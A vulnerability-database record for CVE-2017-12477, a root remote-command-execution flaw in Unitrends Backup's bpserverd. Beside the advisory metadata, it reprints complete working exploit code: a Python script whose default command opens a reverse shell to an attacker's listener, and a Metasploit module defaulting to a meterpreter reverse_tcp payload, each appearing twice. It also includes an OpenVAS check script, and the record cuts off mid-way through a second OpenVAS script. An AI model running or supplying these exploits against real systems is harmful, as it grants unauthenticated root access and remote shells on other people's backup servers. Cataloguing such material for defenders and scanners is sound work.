ID CVE-2017-12477 Type cve Reporter cve@mitre.org Modified 2017-10-26T01:29:00
Description
It was discovered that the bpserverd proprietary protocol in Unitrends Backup (UB) before 10.0.0, as invoked through xinetd, has an issue in which its authentication can be bypassed. A remote attacker could use this issue to execute arbitrary commands with root privilege on the target system.
{"id": "CVE-2017-12477", "bulletinFamily": "NVD", "title": "CVE-2017-12477", "description": "It was discovered that the bpserverd proprietary protocol in Unitrends Backup (UB) before 10.0.0, as invoked through xinetd, has an issue in which its authentication can be bypassed. A remote attacker could use this issue to execute arbitrary commands with root privilege on the target system.", "published": "2017-08-07T15:29:00", "modified": "2017-10-26T01:29:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12477", "reporter": "cve@mitre.org", "references": ["https://support.unitrends.com/UnitrendsBackup/s/article/000005755", "https://www.exploit-db.com/exploits/43031/"], "cvelist": ["CVE-2017-12477"], "type": "cve", "lastseen": "2020-12-09T20:13:21", "edition": 5, "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-28748", "1337DAY-ID-28832"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144693", "PACKETSTORM:144511"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310140446", "OPENVAS:1361412562310140447"]}, {"type": "exploitdb", "idList": ["EDB-ID:42957", "EDB-ID:43031"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:01C4F1CC72C2FAFAB4808FA12E255393"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/MISC/UEB9_BPSERVERD"]}], "modified": "2020-12-09T20:13:21", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2020-12-09T20:13:21", "rev": 2}, "vulnersScore": 5.7}, "cpe": ["cpe:/a:unitrends:backup:9.1"], "affectedSoftware": [{"cpeName": "unitrends:backup", "name": "unitrends backup", "operator": "le", "version": "9.1"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:unitrends:backup:9.1:*:*:*:*:*:*:*"], "cwe": ["CWE-287"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:unitrends:backup:9.1:*:*:*:*:*:*:*", "versionEndIncluding": "9.1", "vulnerable": true}], "operator": "OR"}]}}
{"zdt": [{"lastseen": "2018-01-05T05:23:36", "description": "Exploit for linux platform in category remote exploits", "edition": 1, "published": "2017-10-06T00:00:00", "type": "zdt", "title": "Unitrends UEB 9.1 - Unitrends bpserverd Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12477"], "modified": "2017-10-06T00:00:00", "href": "https://0day.today/exploit/description/28748", "id": "1337DAY-ID-28748", "sourceData": "# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1\r\n# Date: 08/08/2017\r\n# Exploit Authors: Jared Arave, Cale Smith, Benny Husted\r\n# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413\r\n# Vendor Homepage: https://www.unitrends.com/\r\n# Software Link: https://www.unitrends.com/download/enterprise-backup-software\r\n# Version: 9.1\r\n# Tested on: CentOS6\r\n# CVE: CVE-2017-12477\r\n \r\nimport socket\r\nimport binascii\r\nimport struct\r\nimport time\r\nimport sys\r\nfrom optparse import OptionParser\r\n \r\nprint \"\"\"\r\n###############################################################################\r\nUnauthenticated root RCE for Unitrends UEB 9.1\r\nTested against appliance versions:\r\n [+] 9.1.0-2.201611302120.CentOS6\r\n \r\nThis exploit uses roughly the same process to gain root execution\r\nas does the apache user on the Unitrends appliance. The process is\r\nsomething like this:\r\n \r\n1. Connect to xinetd process (it's usually running on port 1743)\r\n2. This process will send something like: '?A,Connect36092'\r\n3. Initiate a second connection to the port specified \r\n in the packet from xinetd (36092 in this example)\r\n4. send a specially crafted packet to xinetd, containing the \r\n command to be executed as root\r\n5. Receive command output from the connection to port 36092\r\n6. Close both connections\r\n \r\nNB: Even if you don't strictly need output from your command,\r\nThe second connection must still be made for the command\r\nto be executed at all.\r\n###############################################################################\r\n\"\"\"\r\n \r\n# Parse command line args:\r\nusage = \"Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\\n\"\\\r\n \" %prog -r <appliance_ip> -c 'touch /tmp/foooooooooooo'\"\r\n \r\nparser = OptionParser(usage=usage)\r\nparser.add_option(\"-r\", '--RHOST', dest='rhost', action=\"store\",\r\n help=\"Target host w/ UNITRENDS UEB installation\")\r\nparser.add_option(\"-l\", '--LHOST', dest='lhost', action=\"store\",\r\n help=\"Host listening for reverse shell connection\")\r\nparser.add_option(\"-p\", '--LPORT', dest='lport', action=\"store\",\r\n help=\"Port on which nc is listening\")\r\nparser.add_option(\"-c\", '--cmd', dest='cmd', action=\"store\",\r\n help=\"Run a custom command, no reverse shell for you.\")\r\nparser.add_option(\"-x\", '--xinetd', dest='xinetd', action=\"store\",\r\n type=\"int\", default=1743, \r\n help=\"port on which xinetd is running (default: 1743)\")\r\n \r\n(options, args) = parser.parse_args()\r\n \r\nif options.cmd:\r\n if (options.lhost or options.lport):\r\n parser.error(\"[!] Options --cmd and [--LHOST||--LPORT] are mutually exclusive.\\n\")\r\n \r\n elif not options.rhost:\r\n parser.error(\"[!] No remote host specified.\\n\")\r\n \r\nelif options.rhost is None or options.lhost is None or options.lport is None:\r\n parser.print_help()\r\n sys.exit(1)\r\n \r\nRHOST = options.rhost\r\nLHOST = options.lhost\r\nLPORT = options.lport\r\nXINETDPORT = options.xinetd\r\n \r\nif options.cmd:\r\n cmd = options.cmd\r\nelse:\r\n cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)\r\n \r\ndef recv_timeout(the_socket,timeout=2):\r\n the_socket.setblocking(0)\r\n total_data=[];data='';begin=time.time()\r\n while 1:\r\n #if you got some data, then break after wait sec\r\n if total_data and time.time()-begin>timeout:\r\n break\r\n #if you got no data at all, wait a little longer\r\n elif time.time()-begin>timeout*2:\r\n break\r\n try:\r\n data=the_socket.recv(8192)\r\n if data:\r\n total_data.append(data)\r\n begin=time.time()\r\n else:\r\n time.sleep(0.1)\r\n except:\r\n pass\r\n return ''.join(total_data)\r\n \r\nprint \"[+] attempting to connect to xinetd on {0}:{1}\".format(RHOST, str(XINETDPORT))\r\n \r\ntry:\r\n s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s1.connect((RHOST,XINETDPORT))\r\nexcept:\r\n print \"[!] Failed to connect!\"\r\n exit()\r\n \r\ndata = s1.recv(4096)\r\nbpd_port = int(data[-8:-3])\r\n \r\nprint \"[+] Connected! Cmd output will come back on {}:{}\".format(RHOST, str(bpd_port))\r\nprint \"[+] Connecting to bpdserverd on {}:{}\".format(RHOST, str(bpd_port))\r\n \r\ntry:\r\n s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s2.connect((RHOST, bpd_port))\r\nexcept:\r\n print \"[!] Failed to connect!\"\r\n s1.close()\r\n exit()\r\n \r\nprint \"[+] Connected! Sending the following cmd to {0}:{1}\".format(RHOST,str(XINETDPORT))\r\nprint \"[+] '{0}'\".format(cmd)\r\n \r\nif (len(cmd) > 240):\r\n print \"[!] This command is long; this might not work.\"\r\n print \"[!] Maybe try a shorter command...\"\r\n \r\ncmd_len = chr(len(cmd) + 3)\r\npacket_len = chr(len(cmd) + 23)\r\n \r\npacket = '\\xa5\\x52\\x00\\x2d'\r\npacket += '\\x00' * 3\r\npacket += packet_len\r\npacket += '\\x00' * 3\r\npacket += '\\x01'\r\npacket += '\\x00' * 3\r\npacket += '\\x4c'\r\npacket += '\\x00' * 3\r\npacket += cmd_len\r\npacket += cmd\r\npacket += '\\x00' * 3\r\n \r\ns1.send(packet)\r\n \r\nprint \"[+] cmd packet sent!\"\r\nprint \"[+] Waiting for response from {0}:{1}\".format(RHOST,str(bpd_port))\r\n \r\ndata = recv_timeout(s2)\r\n \r\nprint \"[+] Here's the output -> \\n\\n\"\r\n \r\nprint data\r\n \r\nprint \"[+] Closing ports, exiting....\"\r\n \r\ns1.close()\r\ns2.close()\r\n \r\n# 3. Solution:\r\n# Update to Unitrends UEB 10\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/28748", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-05T23:43:34", "description": "It was discovered that the api/storage web interface in Unitrends Backup (UB) before 10.0.0 has an issue in which one of its input parameters was not validated. A remote attacker could use this flaw to bypass authentication and execute arbitrary commands with root privilege on the target system.", "edition": 1, "published": "2017-10-22T00:00:00", "type": "zdt", "title": "Unitrends UEB bpserverd Authentication Bypass / Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12477"], "modified": "2017-10-22T00:00:00", "href": "https://0day.today/exploit/description/28832", "id": "1337DAY-ID-28832", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Unitrends UEB bpserverd authentication bypass RCE',\r\n 'Description' => %q{\r\n It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,\r\n has an issue in which its authentication can be bypassed. A remote attacker could use this\r\n issue to execute arbitrary commands with root privilege on the target system.\r\n },\r\n 'Author' =>\r\n [\r\n 'Jared Arave', # @iotennui\r\n 'Cale Smith', # @0xC413\r\n 'Benny Husted' # @BennyHusted\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86],\r\n 'CmdStagerFlavor' => [ 'printf' ],\r\n 'References' =>\r\n [\r\n ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'],\r\n ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'],\r\n ['CVE', '2017-12477'],\r\n ],\r\n 'Targets' =>\r\n [\r\n [ 'UEB 9.*', { } ]\r\n ],\r\n 'Privileged' => true,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',\r\n 'SSL' => false\r\n },\r\n 'DisclosureDate' => 'Aug 8 2017',\r\n 'DefaultTarget' => 0))\r\n register_options([\r\n Opt::RPORT(1743)\r\n ])\r\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')\r\n end\r\n\r\n def check\r\n s1 = connect(global = false)\r\n buf1 = s1.get_once(-1).to_s\r\n #parse out the bpd port returned\r\n bpd_port = buf1[-8..-3].to_i\r\n\r\n #check if it's a valid port number (1-65534)\r\n if bpd_port && bpd_port >= 1 && bpd_port <= 65535\r\n Exploit::CheckCode::Detected\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n\r\n #append a comment, ignore everything after our cmd\r\n cmd = cmd + \" #\"\r\n\r\n # build the attack buffer...\r\n command_len = cmd.length + 3\r\n packet_len = cmd.length + 23\r\n data = \"\\xa5\\x52\\x00\\x2d\"\r\n data << \"\\x00\\x00\\x00\"\r\n data << packet_len\r\n data << \"\\x00\\x00\\x00\"\r\n data << \"\\x01\"\r\n data << \"\\x00\\x00\\x00\"\r\n data << \"\\x4c\"\r\n data << \"\\x00\\x00\\x00\"\r\n data << command_len\r\n data << cmd\r\n data << \"\\x00\\x00\\x00\"\r\n\r\n begin\r\n print_status(\"Connecting to xinetd for bpd port...\")\r\n s1 = connect(global = false)\r\n buf1 = s1.get_once(-1).to_s\r\n\r\n #parse out the bpd port returned, we will connect back on this port to send our cmd\r\n bpd_port = buf1[-8..-3].to_i\r\n\r\n print_good(\"bpd port recieved: #{bpd_port}\")\r\n vprint_status(\"Connecting to #{bpd_port}\")\r\n\r\n s2 = connect(global = false, opts = {'RPORT'=>bpd_port})\r\n vprint_good('Connected!')\r\n\r\n print_status('Sending command buffer to xinetd')\r\n\r\n s1.put(data)\r\n s2.get_once(-1,1).to_s\r\n\r\n disconnect(s1)\r\n disconnect(s2)\r\n\r\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e\r\n fail_with(Failure::Unreachable, \"#{peer} - Connection to server failed\")\r\n end\r\n\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - pwn'ng ueb 9....\")\r\n execute_cmdstager(:linemax => 200)\r\n end\r\nend\n\n# 0day.today [2018-04-05] #", "sourceHref": "https://0day.today/exploit/28832", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2017-10-21T22:05:38", "description": "", "published": "2017-10-21T00:00:00", "type": "packetstorm", "title": "Unitrends UEB bpserverd Authentication Bypass / Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12477"], "modified": "2017-10-21T00:00:00", "id": "PACKETSTORM:144693", "href": "https://packetstormsecurity.com/files/144693/Unitrends-UEB-bpserverd-Authentication-Bypass-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Unitrends UEB bpserverd authentication bypass RCE', \n'Description' => %q{ \nIt was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd, \nhas an issue in which its authentication can be bypassed. A remote attacker could use this \nissue to execute arbitrary commands with root privilege on the target system. \n}, \n'Author' => \n[ \n'Jared Arave', # @iotennui \n'Cale Smith', # @0xC413 \n'Benny Husted' # @BennyHusted \n], \n'License' => MSF_LICENSE, \n'Platform' => 'linux', \n'Arch' => [ARCH_X86], \n'CmdStagerFlavor' => [ 'printf' ], \n'References' => \n[ \n['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'], \n['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'], \n['CVE', '2017-12477'], \n], \n'Targets' => \n[ \n[ 'UEB 9.*', { } ] \n], \n'Privileged' => true, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', \n'SSL' => false \n}, \n'DisclosureDate' => 'Aug 8 2017', \n'DefaultTarget' => 0)) \nregister_options([ \nOpt::RPORT(1743) \n]) \nderegister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') \nend \n \ndef check \ns1 = connect(global = false) \nbuf1 = s1.get_once(-1).to_s \n#parse out the bpd port returned \nbpd_port = buf1[-8..-3].to_i \n \n#check if it's a valid port number (1-65534) \nif bpd_port && bpd_port >= 1 && bpd_port <= 65535 \nExploit::CheckCode::Detected \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef execute_command(cmd, opts = {}) \n \n#append a comment, ignore everything after our cmd \ncmd = cmd + \" #\" \n \n# build the attack buffer... \ncommand_len = cmd.length + 3 \npacket_len = cmd.length + 23 \ndata = \"\\xa5\\x52\\x00\\x2d\" \ndata << \"\\x00\\x00\\x00\" \ndata << packet_len \ndata << \"\\x00\\x00\\x00\" \ndata << \"\\x01\" \ndata << \"\\x00\\x00\\x00\" \ndata << \"\\x4c\" \ndata << \"\\x00\\x00\\x00\" \ndata << command_len \ndata << cmd \ndata << \"\\x00\\x00\\x00\" \n \nbegin \nprint_status(\"Connecting to xinetd for bpd port...\") \ns1 = connect(global = false) \nbuf1 = s1.get_once(-1).to_s \n \n#parse out the bpd port returned, we will connect back on this port to send our cmd \nbpd_port = buf1[-8..-3].to_i \n \nprint_good(\"bpd port recieved: #{bpd_port}\") \nvprint_status(\"Connecting to #{bpd_port}\") \n \ns2 = connect(global = false, opts = {'RPORT'=>bpd_port}) \nvprint_good('Connected!') \n \nprint_status('Sending command buffer to xinetd') \n \ns1.put(data) \ns2.get_once(-1,1).to_s \n \ndisconnect(s1) \ndisconnect(s2) \n \nrescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e \nfail_with(Failure::Unreachable, \"#{peer} - Connection to server failed\") \nend \n \nend \n \ndef exploit \nprint_status(\"#{peer} - pwn'ng ueb 9....\") \nexecute_cmdstager(:linemax => 200) \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/144693/ueb9_bpserverd.rb.txt"}, {"lastseen": "2017-10-08T14:23:12", "description": "", "published": "2017-10-05T00:00:00", "type": "packetstorm", "title": "Unitrends UEB 9.1 bpserverd Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12477"], "modified": "2017-10-05T00:00:00", "id": "PACKETSTORM:144511", "href": "https://packetstormsecurity.com/files/144511/Unitrends-UEB-9.1-bpserverd-Remote-Command-Execution.html", "sourceData": "`# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1 \n# Date: 08/08/2017 \n# Exploit Authors: Jared Arave, Cale Smith, Benny Husted \n# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 \n# Vendor Homepage: https://www.unitrends.com/ \n# Software Link: https://www.unitrends.com/download/enterprise-backup-software \n# Version: 9.1 \n# Tested on: CentOS6 \n# CVE: CVE-2017-12477 \n \nimport socket \nimport binascii \nimport struct \nimport time \nimport sys \nfrom optparse import OptionParser \n \nprint \"\"\" \n############################################################################### \nUnauthenticated root RCE for Unitrends UEB 9.1 \nTested against appliance versions: \n[+] 9.1.0-2.201611302120.CentOS6 \n \nThis exploit uses roughly the same process to gain root execution \nas does the apache user on the Unitrends appliance. The process is \nsomething like this: \n \n1. Connect to xinetd process (it's usually running on port 1743) \n2. This process will send something like: '?A,Connect36092' \n3. Initiate a second connection to the port specified \nin the packet from xinetd (36092 in this example) \n4. send a specially crafted packet to xinetd, containing the \ncommand to be executed as root \n5. Receive command output from the connection to port 36092 \n6. Close both connections \n \nNB: Even if you don't strictly need output from your command, \nThe second connection must still be made for the command \nto be executed at all. \n############################################################################### \n\"\"\" \n \n# Parse command line args: \nusage = \"Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\\n\"\\ \n\" %prog -r <appliance_ip> -c 'touch /tmp/foooooooooooo'\" \n \nparser = OptionParser(usage=usage) \nparser.add_option(\"-r\", '--RHOST', dest='rhost', action=\"store\", \nhelp=\"Target host w/ UNITRENDS UEB installation\") \nparser.add_option(\"-l\", '--LHOST', dest='lhost', action=\"store\", \nhelp=\"Host listening for reverse shell connection\") \nparser.add_option(\"-p\", '--LPORT', dest='lport', action=\"store\", \nhelp=\"Port on which nc is listening\") \nparser.add_option(\"-c\", '--cmd', dest='cmd', action=\"store\", \nhelp=\"Run a custom command, no reverse shell for you.\") \nparser.add_option(\"-x\", '--xinetd', dest='xinetd', action=\"store\", \ntype=\"int\", default=1743, \nhelp=\"port on which xinetd is running (default: 1743)\") \n \n(options, args) = parser.parse_args() \n \nif options.cmd: \nif (options.lhost or options.lport): \nparser.error(\"[!] Options --cmd and [--LHOST||--LPORT] are mutually exclusive.\\n\") \n \nelif not options.rhost: \nparser.error(\"[!] No remote host specified.\\n\") \n \nelif options.rhost is None or options.lhost is None or options.lport is None: \nparser.print_help() \nsys.exit(1) \n \nRHOST = options.rhost \nLHOST = options.lhost \nLPORT = options.lport \nXINETDPORT = options.xinetd \n \nif options.cmd: \ncmd = options.cmd \nelse: \ncmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT) \n \ndef recv_timeout(the_socket,timeout=2): \nthe_socket.setblocking(0) \ntotal_data=[];data='';begin=time.time() \nwhile 1: \n#if you got some data, then break after wait sec \nif total_data and time.time()-begin>timeout: \nbreak \n#if you got no data at all, wait a little longer \nelif time.time()-begin>timeout*2: \nbreak \ntry: \ndata=the_socket.recv(8192) \nif data: \ntotal_data.append(data) \nbegin=time.time() \nelse: \ntime.sleep(0.1) \nexcept: \npass \nreturn ''.join(total_data) \n \nprint \"[+] attempting to connect to xinetd on {0}:{1}\".format(RHOST, str(XINETDPORT)) \n \ntry: \ns1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns1.connect((RHOST,XINETDPORT)) \nexcept: \nprint \"[!] Failed to connect!\" \nexit() \n \ndata = s1.recv(4096) \nbpd_port = int(data[-8:-3]) \n \nprint \"[+] Connected! Cmd output will come back on {}:{}\".format(RHOST, str(bpd_port)) \nprint \"[+] Connecting to bpdserverd on {}:{}\".format(RHOST, str(bpd_port)) \n \ntry: \ns2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns2.connect((RHOST, bpd_port)) \nexcept: \nprint \"[!] Failed to connect!\" \ns1.close() \nexit() \n \nprint \"[+] Connected! Sending the following cmd to {0}:{1}\".format(RHOST,str(XINETDPORT)) \nprint \"[+] '{0}'\".format(cmd) \n \nif (len(cmd) > 240): \nprint \"[!] This command is long; this might not work.\" \nprint \"[!] Maybe try a shorter command...\" \n \ncmd_len = chr(len(cmd) + 3) \npacket_len = chr(len(cmd) + 23) \n \npacket = '\\xa5\\x52\\x00\\x2d' \npacket += '\\x00' * 3 \npacket += packet_len \npacket += '\\x00' * 3 \npacket += '\\x01' \npacket += '\\x00' * 3 \npacket += '\\x4c' \npacket += '\\x00' * 3 \npacket += cmd_len \npacket += cmd \npacket += '\\x00' * 3 \n \ns1.send(packet) \n \nprint \"[+] cmd packet sent!\" \nprint \"[+] Waiting for response from {0}:{1}\".format(RHOST,str(bpd_port)) \n \ndata = recv_timeout(s2) \n \nprint \"[+] Here's the output -> \\n\\n\" \n \nprint data \n \nprint \"[+] Closing ports, exiting....\" \n \ns1.close() \ns2.close() \n \n# 3. Solution: \n# Update to Unitrends UEB 10 \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/144511/unitrendsueb91-exec.txt"}], "openvas": [{"lastseen": "2019-05-29T18:34:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12477"], "description": "Unitrends UEB is prone to a remote code execution vulnerability in\nbpserverd.", "modified": "2018-10-19T00:00:00", "published": "2017-10-23T00:00:00", "id": "OPENVAS:1361412562310140446", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140446", "type": "openvas", "title": "Unitrends RCE Vulnerability", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_unitrends_rce_vuln.nasl 11983 2018-10-19 10:04:45Z mmartin $\n#\n# Unitrends RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140446\");\n script_version(\"$Revision: 11983 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 12:04:45 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-23 13:21:51 +0700 (Mon, 23 Oct 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-12477\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Unitrends RCE Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_unitrends_detect.nasl\");\n script_mandatory_keys(\"unitrends/detected\");\n script_require_ports(1743);\n\n script_tag(name:\"summary\", value:\"Unitrends UEB is prone to a remote code execution vulnerability in\nbpserverd.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the Unitrends bpserverd proprietary protocol, as\nexposed via xinetd, has an issue in which its authentication can be bypassed. A remote attacker could use this\nissue to execute arbitrary commands with root privilege on the target system.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted request to bpserverd and checks the response.\");\n\n script_tag(name:\"affected\", value:\"Unitrends UEB prior to version 10.0.0\");\n\n script_tag(name:\"solution\", value:\"Update to version 10.0.0 or later.\");\n\n script_xref(name:\"URL\", value:\"https://packetstormsecurity.com/files/144693/Unitrends-UEB-bpserverd-Authentication-Bypass-Remote-Command-Execution.html\");\n script_xref(name:\"URL\", value:\"https://support.unitrends.com/UnitrendsBackup/s/article/000005755\");\n\n exit(0);\n}\n\nport = 1743;\nif (!get_port_state(port))\n exit(0);\n\nsoc1 = open_sock_tcp(port);\nif (!soc1)\n exit(0);\n\nrecv = recv(socket: soc1, length: 512);\n\nif (\"Connect\" >!< recv || strlen(recv) < 41) {\n close(soc1);\n exit(0);\n}\n\nbackport = substr(recv, 36, 40);\nif (!backport || backport < 1 || backport > 65535) {\n close(soc1);\n exit(0);\n}\n\n# Open the back port for the result\nsoc2 = open_sock_tcp(backport);\nif (!soc2) {\n close(soc1);\n exit(0);\n}\n\n# It seems we have to pipe the results to a file to get the result back\ncmd = 'id > /tmp/openvas#';\ncmd_len = strlen(cmd) + 3;\npkt_len = strlen(cmd) + 23;\n\ndata = raw_string(0xa5, 0x52, 0x00, 0x2d, 0x00, 0x00, 0x00, pkt_len, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,\n 0x4c, 0x00, 0x00, 0x00, cmd_len, cmd, 0x00, 0x00, 0x00);\n\n# Send to first port and get the response over the back port\nsend(socket: soc1, data: data);\nrecv = recv(socket: soc2, length: 1024);\n\nclose(soc1);\nclose(soc2);\n\nif (recv =~ 'uid=[0-9]+.*gid=[0-9]+') {\n report = \"It was possible to execute the 'id' command.\\n\\nResult:\\n\" + recv;\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12479", "CVE-2017-12478", "CVE-2017-12477"], "description": "Unitrends UEB is prone to multiple vulnerabilities.", "modified": "2018-10-26T00:00:00", "published": "2017-10-23T00:00:00", "id": "OPENVAS:1361412562310140447", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140447", "type": "openvas", "title": "Unitrends Multiple Vulnerabilities", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_unitrends_mult_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Unitrends Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:unitrends:enterprise_backup';\n\nif (description)\n{\n 